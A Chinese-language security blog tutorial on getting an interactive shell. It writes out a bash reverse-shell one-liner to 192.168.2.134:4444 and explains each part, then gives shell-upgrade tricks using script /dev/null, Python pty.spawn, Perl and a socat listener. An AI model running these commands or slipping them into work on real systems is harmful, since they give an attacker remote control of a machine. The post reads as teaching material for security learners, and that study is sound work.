<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/><meta name="author" content="jjjing"/><meta name="copyright" content="jjjing"/><meta name="theme-color" content="#FFB347"/><meta name="format-detection" content="telephone=no"/><meta name="keywords" content="Hexo Theme MEOW"/><meta name="mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-touch-fullscreen" content="yes"/><meta name="application-name" content="获取交互式shell精讲 | jjjing"/><meta name="apple-mobile-web-app-title" content="获取交互式shell精讲 | jjjing"/><meta name="apple-mobile-web-app-status-bar-style" content="#FFB347"/><link rel="canonical" href="https://jinggg1123.github.io/archives/2023/11/28/获取交互式shell精讲/"/><meta name="description" content="解决问题：怎么利用获取交互式shell？原理是什么？ bash获得反向Shell1bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.2.134&#x2F;4444 0&gt;&amp;1 解释每个部分：  bash： 启动一个Bash shell。 -i： 以交互式模式运行，这样用户可以与shell进行交互。  &amp;： 将标准输出（文件描述符1）和标准错误输出（文件描述符2）...">
<meta property="og:type" content="article">
<meta property="og:title" content="获取交互式shell精讲 | jjjing">
<meta property="og:url" content="https://jinggg1123.github.io/archives/2023/11/28/%E8%8E%B7%E5%8F%96%E4%BA%A4%E4%BA%92%E5%BC%8Fshell%E7%B2%BE%E8%AE%B2/index.html">
<meta property="og:site_name" content="jjjing">
<meta property="og:description" content="解决问题：怎么利用获取交互式shell？原理是什么？ bash获得反向Shell1bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.2.134&#x2F;4444 0&gt;&amp;1 解释每个部分：  bash： 启动一个Bash shell。 -i： 以交互式模式运行，这样用户可以与shell进行交互。  &amp;： 将标准输出（文件描述符1）和标准错误输出（文件描述符2）...">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://jinggg1123.github.io/archives/2023/11/28/%E8%8E%B7%E5%8F%96%E4%BA%A4%E4%BA%92%E5%BC%8Fshell%E7%B2%BE%E8%AE%B2/assets/images/Hexo-Theme-MEOW.png">
<meta property="article:published_time" content="2023-11-28T07:11:33.000Z">
<meta property="article:modified_time" content="2024-12-08T13:23:39.561Z">
<meta property="article:author" content="jjjing">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://jinggg1123.github.io/archives/2023/11/28/%E8%8E%B7%E5%8F%96%E4%BA%A4%E4%BA%92%E5%BC%8Fshell%E7%B2%BE%E8%AE%B2/assets/images/Hexo-Theme-MEOW.png"><meta name="robots" content="index,follow"/><meta name="googlebot" content="index,follow"/><meta name="revisit-after" content="1 days"/><title>获取交互式shell精讲 | jjjing</title><link rel="shortcut icon" href="/assets/images/Hexo-Theme-MEOW.ico"><link rel="preconnect" href="/assets"/><link rel="preconnect" href="assets"/>
<link rel="stylesheet" href="/css/style.css">

<link rel="stylesheet" href="/css/third-party/dist/APlayer.min.css">
<link rel="prefetch" href="/"/><link rel="prefetch" href="/archives"/><link rel="prefetch" href="/tags"/><meta name="generator" content="Hexo 6.3.0"></head><body bg-style="none"><div class="post-progressbar-container"><div class="post-progressbar"></div></div><header><div id="navbar"><div id="nav-info"><a id="site-icon" href="/" title="主页"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a id="site-name" href="/" title="主页"><div>jjjing</div><img src="/assets/images/svg/uc/uc-home.svg" class="icon noview" alt="Icon"></a></div><div id="nav-menu"><div class="menu-item"><a href="/archives"><img src="/assets/images/svg/uc/uc-archive.svg" class="icon noview" alt="Icon"><span>归档</span></a></div><div class="menu-item"><a href="/categories"><img src="/assets/images/svg/uc/uc-category.svg" class="icon noview" alt="Icon"><span>分类</span></a></div><div class="menu-item"><a href="/about"><img src="/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>关于</span></a></div></div><div id="nav-function"><div id="search-btn"><a href="javascript:void(0);" title="搜索" accesskey="s"><img src="/assets/images/svg/uc/uc-search.svg" class="icon noview" alt="Icon"><span>搜索</span></a></div><div id="menu-btn"><a href="javascript:void(0);" title="打开菜单"><img src="/assets/images/svg/uc/uc-menu.svg" class="icon noview" alt="Icon"></a></div></div></div></header><div id="menu-aside"><div id="menu-aside-container"><div id="menu-aside-info"><a href="/" title="主页"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a href="/" title="主页">jjjing</a></div><div class="menu-aside-item"><a href="/archives"><img src="/assets/images/svg/uc/uc-archive.svg" class="icon noview" alt="Icon"><span>归档</span></a></div><div class="menu-aside-item"><a href="/categories"><img src="/assets/images/svg/uc/uc-category.svg" class="icon noview" alt="Icon"><span>分类</span></a></div><div class="menu-aside-item"><a href="/about"><img src="/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>关于</span></a></div><hr/></div></div><main><div class="banner"><div class="banner-info"><div class="banner-avatar"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Avatar"/></div><div class="banner-title">「 MEOW 」</div></div></div><div class="post-container"><div class="post-main"><div class="post-content"><h1 class="post-title">获取交互式shell精讲</h1><div class="post-author"><span>作者: jjjing</span></div><div class="post-meta"><div class="post-info"><div class="post-date"><div class="post-pubdate"><img src="/assets/images/svg/ta/ta-pubdate.svg" class="icon noview" alt="Icon"><span>发表于2023-11-28</span></div><div class="post-update"><img src="/assets/images/svg/ta/ta-update.svg" class="icon noview" alt="Icon"><span>更新于2024-12-08</span></div></div><div class="post-read"></div></div><div class="post-attribute"><div class="post-categories"><img src="/assets/images/svg/ta/ta-category.svg" class="icon noview" alt="Icon"><span><a class="post-categories-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a></span></div></div></div><div class="post markdown" indent="false"><p>解决问题：怎么利用获取交互式shell？原理是什么？</p>
<h1><span id="bash获得反向shell">bash获得反向Shell</span></h1><div class="code-container" code-lang="Python"><div class="codebox"><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/<span class="number">192.168</span><span class="number">.2</span><span class="number">.134</span>/<span class="number">4444</span> <span class="number">0</span>&gt;&amp;<span class="number">1</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>解释每个部分：</p>
<ul>
<li>bash： 启动一个Bash shell。</li>
<li>-i： 以<strong>交互式模式</strong>运行，这样用户可以与shell进行交互。</li>
<li><blockquote>
<p>&amp;： 将标准输出（文件描述符1）和标准错误输出（文件描述符2）合并。</p>
</blockquote>
</li>
<li>&#x2F;dev&#x2F;tcp&#x2F;192.168.2.134&#x2F;4444： 这是一个特殊的构造，它试图打开一个TCP连接到指定的IP地址（192.168.2.134）和端口号（4444）。在这里，&#x2F;dev&#x2F;tcp是一个特殊的文件系统，Bash试图将其解释为一个<strong>网络套接字</strong>。如果这个连接成功建立，那么接下来的输入输出将与这个套接字相关联。</li>
<li>0&gt;&amp;1： 将标准输入（文件描述符0）重定向到标准输出。这意味着用户输入将被发送到网络连接，而不是终端。</li>
</ul>
<p>这个命令的目的是在远程主机（192.168.2.134）的4444端口上启动一个Bash shell，并将输入和输出通过网络连接。这种技术通常用于建立一个<strong>反向Shell</strong>，这样攻击者就可以通过该连接执行命令，并获得远程系统的控制权。</p>
<blockquote>
<p><code>man bas</code>获得bash的帮助手册。</p>
</blockquote>
<h2><span id="网络套接字socket">网络套接字Socket</span></h2><p>网络套接字是一种网络编程的抽象，用于在计算机网络上进行通信。套接字（Socket）是一种通信机制，它允许在不同计算机之间的进程进行数据交换。在Linux和类Unix系统中，套接字通常以文件描述符的形式存在。</p>
<p>在这个特定的Bash命令中，&#x2F;dev&#x2F;tcp&#x2F;192.168.2.134&#x2F;4444的部分是一个尝试使用Bash的特殊文件系统来打开一个TCP套接字。在Bash中，&#x2F;dev&#x2F;tcp和&#x2F;dev&#x2F;udp是一种特殊的文件系统，允许将I&#x2F;O操作重定向到实际的网络套接字。</p>
<p>当使用 &gt;&amp; 将标准输出和标准错误输出合并时，命令的输入输出将被定向到这个套接字。0&gt;&amp;1 将标准输入重定向到标准输出，这样用户输入将通过网络连接发送，而不是终端。因此，通过这个网络连接，可以在远程主机上执行Bash shell，并将输入输出通过网络传输。</p>
<p>总体而言，这种技术通常被称为反向Shell，因为它是一个由目标系统启动并与攻击者的系统建立连接的Shell。</p>
<h2><span id="标准输出gtamp">标准输出&gt;&amp;</span></h2><p>在Unix-like系统中，每个运行的进程都有三个标准文件描述符：</p>
<ol>
<li>标准<strong>输入</strong>（stdin，文件描述符<strong>0</strong>）： 通常用于接收输入数据。默认情况下，它通常与终端关联。</li>
<li>标准<strong>输出</strong>（stdout，文件描述符<strong>1</strong>）： 用于输出正常的运行信息。默认情况下，它通常与终端关联。</li>
<li>标准<strong>错误输出</strong>（stderr，文件描述符<strong>2</strong>）： 用于输出错误信息。默认情况下，它通常与终端关联。</li>
</ol>
<p>将<code>标准输出</code>和<code>标准错误输出</code>合并意味着将它们指向相同的地方，以便它们共享同一个输出目标。在Bash中，可以使用 <code>**&gt;&amp;**</code> 来实现这一点。</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">command</span> &gt; file 2&gt;&amp;1</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>上述命令将 标准输出 重定向到文件file，并将 标准错误输出 指向与 标准输出 相同的地方（这里是文件 file）。因此，标准输出和标准错误输出都被追加到同一个文件(file)中。<br>在你提到的Bash命令中：</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/192.168.2.134/4444 0&gt;&amp;1</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>这部分 &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.2.134&#x2F;4444<br>将 标准输出 和 标准错误输出 合并（&gt;&amp;），<br>并重定向到指定的TCP套接字（&#x2F;dev&#x2F;tcp&#x2F;192.168.2.134&#x2F;4444）。<br>而 0&gt;&amp;1 将 标准输入 重定向到标准输出，从而<strong>将用户的输入也发送到了同一个TCP套接字</strong>。这就实现了<strong>输入输出</strong>通过网络连接的目的，允许在远程主机上执行交互式Bash shell。</p>
<h1><span id="提示没有-tty">提示没有 tty</span></h1><p>在某些情况下，当使用Bash通过网络连接获取交互式Shell时，可能会导致<code>top</code>等命令报告没有<strong>tty</strong>（终端）。</p>
<blockquote>
<p>这是因为top等一些工具通常会检查<strong>当前进程是否与一个终端（tty）相关联</strong>，以决定如何以及何种方式显示信息。在这种情况下，由于Bash被用于通过网络连接进行交互，而不是通过终端，top可能会在检查tty时报告没有找到。</p>
</blockquote>
<p>为了解决这个问题，可以使用script命令或script命令的变种，例如script &#x2F;dev&#x2F;null，来创建一个<code>伪终端pty</code>。这样，top等工具就会认为它们正在与一个终端进行交互，而不会报告没有tty的错误。</p>
<h2><span id="script获取pty">script获取pty</span></h2><div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">script /dev/null</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>这样，你可以欺骗top，使其认为它与一个终端相关联，从而解决这个问题。<br>让我逐步解释这个命令：</p>
<ol>
<li>script： 这是一个用于<strong>记录 shell 会话的命令</strong>。它会创建一个伪终端并将终端的输入和输出记录到指定的文件中（默认是typescript）。</li>
<li>&#x2F;dev&#x2F;null：&#x2F;dev&#x2F;null 是一个特殊的设备文件，<strong>用于丢弃数据</strong>。在这里，它作为输出文件名传递给 script 命令，表示不实际记录到文件，而是<strong>将记录的输出直接丢弃</strong>。</li>
</ol>
<p>所以，script &#x2F;dev&#x2F;null 的效果是<strong>创建一个伪终端，但将记录的输入和输出都丢弃，不会将其写入文件</strong>。这种用法通常用于欺骗某些程序，使它们认为正在与终端进行交互，从而绕过一些可能与非交互式 shell 有关的问题。</p>
<h2><span id="python获得pty">python获得pty</span></h2><div class="code-container" code-lang="Python"><div class="codebox"><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>这是一个使用Python来提升shell的交互性的命令。具体来说，这个命令使用pty模块来创建一个伪终端（pseudo terminal，pty），然后在该伪终端上启动一个交互式的Bash shell。<br>让我逐步解释这个命令：</p>
<ol>
<li>python： 启动Python解释器。</li>
<li>-c ‘import pty; pty.spawn(“&#x2F;bin&#x2F;bash”)’： 在Python解释器中执行的命令。这段代码使用<strong>pty模块</strong>，其中的<strong>spawn函数</strong>会创建一个子进程，并将其<strong>连接到一个伪终端</strong>。然后，它在这个伪终端上启动了一个Bash shell (&#x2F;bin&#x2F;bash)。<blockquote>
<p>这种技术通常被称为pty shell或伪终端shell，它可以提高交互性，允许诸如命令历史记录和自动补全等功能的正常工作。</p>
</blockquote>
</li>
</ol>
<h2><span id="perl获得pty">Perl获得pty</span></h2><div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">perl -e <span class="string">&#x27;exec &quot;/bin/bash&quot;;&#x27;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>这个命令使用 Perl 来执行 &#x2F;bin&#x2F;bash，可能会分配一个伪终端</p>
<h2><span id="socat获得pty">socat获得pty</span></h2><p>如果 socat 工具可用，可以使用它来创建一个连接到终端的伪终端：</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat file:`<span class="built_in">tty</span>`,raw,<span class="built_in">echo</span>=0 tcp-listen:4444</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>在这个例子中，socat会将连接的终端作为一个文件传递给 tty 命令，然后创建一个 TCP 监听器。你可以通过连接到这个监听器来获取一个伪终端。</p>
</div><div class="post-reward"><div class="post-reward-btn" title="赞赏作者"><img src="/assets/images/svg/uc/uc-gift.svg" class="icon noview" alt="Icon"><span></span></div><div class="post-reward-content"><div class="post-reward-text"></div><div class="post-reward-list"><a href="/null" target="_blank">致谢名单</a></div></div></div><div class="post-copyright"><div class="post-copyright-info">本作品由 jjjing 于 2023-11-28 15:11:33 发布</div><div class="post-copyright-link"><span>作品地址：<a href="https://jinggg1123.github.io/archives/2023/11/28/%E8%8E%B7%E5%8F%96%E4%BA%A4%E4%BA%92%E5%BC%8Fshell%E7%B2%BE%E8%AE%B2/">获取交互式shell精讲</a></span><button class="copy-text" type="button" data-text="https://jinggg1123.github.io/archives/2023/11/28/%E8%8E%B7%E5%8F%96%E4%BA%A4%E4%BA%92%E5%BC%8Fshell%E7%B2%BE%E8%AE%B2/">复制</button></div><div class="post-copyright-detail">除特别声明外，本站作品均采用 <a href='https://creativecommons.org/licenses/by-nc-sa/4.0/' title='Attribution-NonCommercial-ShareAlike' target='_blank'>CC BY-NC-SA 4.0</a> 许可协议，转载请注明来自 <a href='/'>jjjing</a></div><img class="post-copyright-icon noview" src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></div><div class="post-tail-tags"></div><div class="post-nav"><a class="post-nav-prev" href="/2023/12/20/%E5%86%85%E7%BD%91%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" title="内网基础知识">上一篇<span>内网基础知识</span></a><a class="post-nav-next" href="/2023/01/09/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%A7%BF%E5%8A%BF%E9%9B%86%E6%80%BB/" title="PHP反序列化姿势集总">下一篇<span>PHP反序列化姿势集总</span></a></div></div><aside id="post-sidebar" status="show" active=""><div id="toc-container"><div class="toc-title"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"><span>目录</span></div><div class="toc-content" id="toc-div"><ol class="toc-list"><li class="toc-list-item toc-list-level-1"><a class="toc-list-link"><span class="toc-list-text">bash获得反向Shell</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">网络套接字Socket</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">标准输出&gt;&amp;</span></a></li></ol></li><li class="toc-list-item toc-list-level-1"><a class="toc-list-link"><span class="toc-list-text">提示没有 tty</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">script获取pty</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">python获得pty</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">Perl获得pty</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link"><span class="toc-list-text">socat获得pty</span></a></li></ol></li></ol></div></div><script>document.addEventListener('DOMContentLoaded', function () {
  var headings = Array.from(document.querySelectorAll('.post h1, .post h2, .post h3, .post h4, .post h5, .post h6'));
  var usedHeadings = [];

  document.querySelectorAll('#toc-container .toc-list-link').forEach(function (link) {
    var title = link.querySelector('.toc-list-text').textContent.trim();
    var item = link.closest('.toc-list-item');
    var level = (item.className.match(/toc-list-level-(\d)/) || [])[1];
    var heading = headings.find(function (node) {
      return usedHeadings.indexOf(node) === -1 &&
        (!level || node.tagName === 'H' + level) &&
        node.textContent.trim() === title;
    });
    if (!heading) return;

    var target = heading.id ? heading : heading.querySelector('[id]');
    if (!target) return;
    usedHeadings.push(heading);
    link.setAttribute('href', '#' + encodeURIComponent(target.id));
    link.setAttribute('data-toc-target', target.id);
  });

  document.addEventListener('click', function (event) {
    var link = event.target.closest('#toc-container .toc-list-link[data-toc-target]');
    if (!link) return;

    var heading = document.getElementById(link.getAttribute('data-toc-target'));
    if (!heading) return;

    event.preventDefault();
    event.stopPropagation();
    window.history.pushState(null, '', link.getAttribute('href'));
    heading.scrollIntoView({ behavior: 'smooth', block: 'start' });
  }, true);
});</script></aside></div></div><div id="toolbar" hide=""><div id="toolbar-setting-container" hide=""><div class="toolbar-item"><button id="tool-color-mode" title="深色模式" type="button"><img src="/assets/images/svg/ta/ta-moon.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button class="copy-text" id="tool-share" title="分享" type="button" data-text="https://jinggg1123.github.io/archives/2023/11/28/%E8%8E%B7%E5%8F%96%E4%BA%A4%E4%BA%92%E5%BC%8Fshell%E7%B2%BE%E8%AE%B2/"><img src="/assets/images/svg/ta/ta-share.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-plus" title="放大字体" type="button"><img src="/assets/images/svg/ta/ta-text-plus.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-minus" title="缩小字体" type="button"><img src="/assets/images/svg/ta/ta-text-minus.svg" class="icon noview" alt="Icon"></button></div></div><div class="toolbar-container"><div class="toolbar-item"><button id="tool-setting" title="设置" type="button"><img src="/assets/images/svg/ta/ta-setting.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-toc" title="目录" type="button" aria-controls="post-sidebar" aria-expanded="true"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-gototop" title="返回顶部" type="button"><img src="/assets/images/svg/ta/ta-up.svg" class="icon noview" alt="Icon"></button></div></div></div><div class="search-overlay"><div class="search-container"><div class="search-header"><div class="search-title"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M10 10m-7 0a7 7 0 1 0 14 0a7 7 0 1 0 -14 0" /><path d="M21 21l-6 -6" /></svg>
搜索</div><div class="search-close-btn"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 21a9 9 0 0 0 9 -9a9 9 0 0 0 -9 -9a9 9 0 0 0 -9 9a9 9 0 0 0 9 9z" /><path d="M9 8l6 8" /><path d="M15 8l-6 8" /></svg></div></div><div class="search-input-box"><input id="search-input" type="search" placeholder="请输入关键词进行站内搜索……" value="" maxlength="80"/></div><div class="search-result-container"><div class="search-result-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M10 10m-7 0a7 7 0 1 0 14 0a7 7 0 1 0 -14 0" /><path d="M21 21l-6 -6" /></svg></div></div></div></div><div id="music-player"></div></main><footer><div class="footer"><div id="footer-copyright">© 2021 - 2026 <span>💗</span> <a href="/null">jjjing</a></div><div id="footer-info"><div id="footer-framework">🚀本站由 <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/chanwj/hexo-theme-meow" title="3.3.2" target="_blank">Meow</a> 强力驱动</div><div id="footer-runtime"><span id="runtime" data-startdate="2021-11-23T22:16:20.000Z">🌻已稳定运行.年.月.天</span></div></div></div></footer><div class="scripts"><script>const GLOBALCONFIG = {
  root: '/',
  toolbar: true,
  lazyload_src: '/assets/images/Meow-Loading.webp',
  friends: false,
  album: '',
  codeblock: true,
  code_copy_text: true,
  share_text: '🐱Share From Meow',
  onblur_title: 'Please Come Back～✧(´▽`ʃ♡ƪ)',
  mouse_click: false,
  notify:{
    enable: false,
    info: '复制成功～转载请标注本文地址',
    f12_info: '开发者模式已打开，请遵循本站版权协议'
  },
  search: {
    enable: true,
    path: '',
    local: {
      top_n_per_article: 1,
      preload: false
    }
  },
  encrypt: false,
  category: false,
};
</script><script>if (!localStorage.getItem('color-mode')) {
  localStorage.setItem('color-mode', 'light' || 'light');
}
document.body.setAttribute('data-mode', localStorage.getItem('color-mode'));
</script>
<script src="/js/theme/tools/utils.js"></script>

<script src="/js/plugins/dist/lazyload.min.js"></script>

<script src="/js/plugins/view-image.min.js"></script>
<script>if (localStorage.getItem('font-size')) {
  document.querySelector('.post').style.fontSize = localStorage.getItem('font-size') + 'px';
}
</script>
<script src="/js/plugins/dist/APlayer.min.js"></script>
<script>const initAplayer = (data) => {
  if (!data.length) return;

  const ap = new APlayer({
    container: document.getElementById('music-player'),
    fixed: true,
    autoplay: false,
    theme: '#FFB347',
    loop: 'all',
    order: 'list',
    volume: 0.7,
    lrcType: 3,
    audio: data
  });

  ap.on('play', () => {
    document.getElementById('music-player').setAttribute("play", "");
  });
